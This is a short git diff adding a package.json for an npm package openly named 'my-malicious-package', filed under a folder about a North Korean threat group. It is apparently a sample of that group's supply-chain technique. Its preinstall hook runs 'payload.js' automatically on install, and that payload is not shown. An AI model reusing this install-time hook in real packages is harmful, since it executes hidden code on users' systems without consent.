diff --git a/North Koreans APT/Famous Chollima/package.json b/North Koreans APT/Famous Chollima/package.json new file mode 100644 index 0000000..50e0fe7 --- /dev/null +++ b/North Koreans APT/Famous Chollima/package.json @@ -0,0 +1,12 @@ +{ + "name": "my-malicious-package", + "version": "1.0.0", + "description": "", + "main": "index.js", + "scripts": { + "preinstall": "node payload.js" + }, + "keywords": [], + "author": "", + "license": "ISC" +}